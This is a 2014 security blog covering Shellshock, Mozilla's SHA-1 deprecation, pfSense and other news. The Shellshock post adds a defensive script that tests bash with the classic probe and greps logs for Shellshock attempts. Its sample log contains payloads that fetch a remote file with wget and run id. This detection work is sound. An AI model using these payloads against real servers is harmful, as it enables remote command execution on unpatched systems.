
Sunday, 28 September 2014

This week in security Week 39

This is my review of the biggest security news of last week. Because of all the trouble around bash, there are only two topics this week.

Mozilla will phase out SHA-1 certificates. As reported in a blog post, and prompted by the growing body of attacks against this almost 20-year-old hash function, Mozilla will drop support for SHA-1 certificates. CAs and server operators should renew their certificates and switch to a newer algorithm (SHA-256). According to the timeline, Firefox will still accept these certificates until 2017-01-01.

A bash vulnerability was found. It was reported as CVE-2014-6271. Put simply: bash imports shell functions from exported environment variables whose value starts with "() {", and vulnerable versions also execute any commands that follow the function body. Because many services hand attacker-controlled data to bash through the environment, for example the DHCP client, which runs its hook scripts with values received from the DHCP server, a malicious server can inject commands into the client and have them executed.
Looking back over the news of the week, nothing was as important as this flaw in bash, so let's go into a bit more detail. Many proofs of concept were published this week; what they all have in common is that you need a service that passes its input to bash, and that service has to be reachable from the external network.

Taken from the bug description, here is the (first) list of possible attack vectors:
  • Apache HTTP Server using mod_cgi or mod_cgid scripts that are either written in bash or spawn GNU Bash subshells, or on any system where the /bin/sh interface is implemented using GNU Bash.
  • Override or Bypass ForceCommand feature in OpenSSH sshd and limited protection for some Git and Subversion deployments used to restrict shells and allows arbitrary command execution capabilities. This data path is vulnerable on systems where the /bin/sh interface is implemented using GNU Bash.
  • Allow arbitrary commands to run on a DHCP client machine.

So, what is bad in this case: if you use bash for CGI scripts in your web service, you should fix this bug. If you run servers in a data center and your provider assigns your IP address via DHCP, you should fix your systems and talk to your provider.
All in all it is not easy to inject calls into your bash from an external network, or at least it should not be. In any case, updates are available, so patch your systems. If you are unsure, you may be running an outdated version that will not receive any updates; in that case shut down the service you suspect is affected and test it.
IBM's intrusion detection solution has been using a mechanism to block shell injection of this kind for seven years.
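As an added example (not part of the original post, and not code from the bash or Apache projects), the following shell script does two things a practitioner wants at this point: it checks whether the locally installed bash still executes the trailing command of a crafted environment variable, which is the mechanism behind CVE-2014-6271, and it scans Apache access logs for the "() {" function prefix that Shellshock probes against CGI scripts leave in the User-Agent or other header fields. The three log lines are constructed for this example, with addresses from the documentation ranges; the function names are my own.

```shell
#!/bin/sh
# Added example, not code from the original post.

# Part 1: test the local bash for CVE-2014-6271.
# A vulnerable bash imports a function from any exported variable whose
# value starts with "() {" and then keeps parsing, so the trailing
# "echo vulnerable" runs when the child bash starts. A patched bash
# ignores the variable (or only warns on stderr).
shellshock_check() {
    if ! command -v bash >/dev/null 2>&1; then
        echo "no-bash"          # nothing to test on this host
        return 0
    fi
    # The child is only asked to run "echo test"; any extra output on
    # stdout comes from the injected trailing command.
    out=$(env X='() { :;}; echo vulnerable' bash -c 'echo test' 2>/dev/null || true)
    case "$out" in
        *vulnerable*) echo "vulnerable" ;;
        *)            echo "patched" ;;
    esac
}

# Part 2: find Shellshock probes in Apache access logs.
# Constructed sample lines (not real traffic): two probes against CGI
# scripts, carrying the payload in the User-Agent and Referer field, and
# one ordinary request.
sample_log() {
    cat <<'EOF'
192.0.2.10 - - [25/Sep/2014:10:12:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c \"wget http://198.51.100.5/x -O /tmp/x\""
192.0.2.11 - - [25/Sep/2014:10:12:05 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.12 - - [25/Sep/2014:10:12:09 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 64 "() { ignored; }; echo Content-Type: text/plain; echo; /usr/bin/id" "curl/7.37.0"
EOF
}

# Match the function-definition prefix anywhere in the line: mod_cgi
# exports every request header as an environment variable, so the payload
# can sit in User-Agent, Referer, Cookie or any other header.
shellshock_probes() {
    grep '()[[:space:]]*{' || true
}

# Number of matching lines read from stdin.
count_shellshock_probes() {
    shellshock_probes | wc -l | tr -d ' '
}

# Unique source addresses of matching lines read from stdin.
shellshock_sources() {
    shellshock_probes | cut -d' ' -f1 | sort -u
}

# Stand-alone run: report the local bash status and scan the sample log.
echo "local bash: $(shellshock_check)"
echo "probes in sample log: $(sample_log | count_shellshock_probes)"
echo "sources:"
sample_log | shellshock_sources
```

On a real system replace sample_log with the access log (for example cat /var/log/apache2/access.log | shellshock_sources). A hit only proves that someone probed; whether the probe succeeded depends on the CGI script and on the bash version, which is what the first check answers.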

Tuesday, 23 September 2014

[Tool] pfsense, the all-in-one firewall

If you look at what the big network-equipment vendors build on, FreeBSD turns up repeatedly; Juniper's Junos, for example, is derived from it.

pfSense is another firewall system that builds on FreeBSD. The project describes itself as follows:

The pfSense® project is a free, open source customized distribution of FreeBSD specifically tailored for use as a firewall and router that is entirely managed via web interface. In addition to being a powerful, flexible firewalling and routing platform, it includes a long list of related features and a package system allowing further expandability without adding bloat and potential security vulnerabilities to the base distribution. The pfSense project has become a fairly popular project with more than 1 million downloads since its inception, and proven in countless installations ranging from small home networks protecting a single computer to large corporations, universities and other organizations protecting thousands of network devices.
This project started in 2004 as a fork of the m0n0wall project, but focused towards full PC installations rather than the embedded hardware focus of m0n0wall. We also offer an embedded image for Compact Flash based installations. The two projects have since diverged significantly.
We've steadily grown to become one of the most widely used network firewalls in the world, with in excess of 200,000 known live installs as of December 2013.

In the usual case you just download the installer image from the project website; both i386 and amd64 architectures are supported. The basic installation is easy to handle.
After the reboot you need to assign two interfaces:

  • WAN interface: the Wide Area Network interface, your external connection
  • LAN interface: the Local Area Network interface, your internal connection
In today's typical design the firewall sits between the external and the internal network, so every packet from outside has to pass through the firewall first.

pfSense has a large package repository: many features are already included, and others are easy to install and are integrated into the web configuration interface. The following list gives an overview of some of these components.
  • Suricata, the high performance network IDS, IPS and security monitoring engine by the OISF.
  • HAProxy, the reliable, high performance TCP/HTTP load balancer.
  • MailScanner, an e-mail security and anti-spam package for e-mail gateway systems.
  • Proxy Server with mod_security: ModSecurity is a web application firewall that can work either embedded or as a reverse proxy. It provides protection from a range of attacks against web applications and allows HTTP traffic monitoring, logging and real-time analysis. In addition this package allows URL forwarding, which is convenient for hosting multiple websites behind pfSense on a single IP address.
  • Squid with SquidGuard, a high performance web proxy cache. It combines the Squid proxy server with its ability to act as an HTTP/HTTPS reverse proxy, and includes an Outlook Web Access (OWA) assistant.
and many, many more.

pfSense is fully manageable via the web interface. Once both LAN and WAN are set, be careful: access from the WAN side is blocked by default, so you will not be able to reach the GUI or SSH from outside. Get your internal IP addressing right first and manage the firewall from the LAN side.

Sunday, 21 September 2014

This week in security Week 38

Regarding security-related news it was an endless week (again); the following are just some of the topics of this week.

FreeBSD has finally closed a bug in its TCP stack that was originally found back in 2004 (CVE-2004-0230). The bug can be used for a denial-of-service attack by injecting TCP RST segments into an established connection. RST segments are normally sent in reply to a segment that does not belong to any open connection, for example when the destination port is closed. The issue matters most for connections with large window sizes and long lifetimes, such as BGP sessions, because the attacker only has to guess a sequence number that falls somewhere inside the receive window. FreeBSD is also the basis of Juniper's Junos and of the BSD layer of Mac OS X, for example.

APT, the package management system of Debian and Ubuntu, closed a bug in package verification. Basically, reinstalling a package did not verify the package again, so if an attacker was able to replace the package in the cache or temp directory, that package would simply be installed.

As reported by several teams, last week saw a big increase in chargen-related attacks. Chargen (RFC 864) is a legacy inetd service that listens on port 19 for TCP and UDP. On UDP it answers each datagram with between 0 and 512 random characters, sent back to the source address and port of the request. A datagram with a spoofed source address therefore makes chargen send that data to any host and port the attacker chooses, so an open chargen service can serve as a reflector in a DDoS attack. I would recommend blocking all inbound UDP traffic with source port 19 on a central firewall, and disabling chargen on your own hosts so they cannot be used as reflectors.

SpiderLabs, the maintainers of the OWASP ModSecurity Core Rule Set, reported a new attack seen on their honeypots: the well-known PHP CGI vulnerability is being used to upload and install malware.

There was a really good post on the Red Hat security blog about the TLS landscape today. In my opinion the key outcome of the post is that we really need to increase SSL/TLS usage. Currently only 40% of all web servers support TLS by default. Maybe Google's idea of ranking TLS sites higher than others will help here too.

In the USA the do-it-yourself chain Home Depot had a breach, and 56,000,000 credit card records were lost. According to new reports, many employees told management years ago that this information was not secured the way it should be.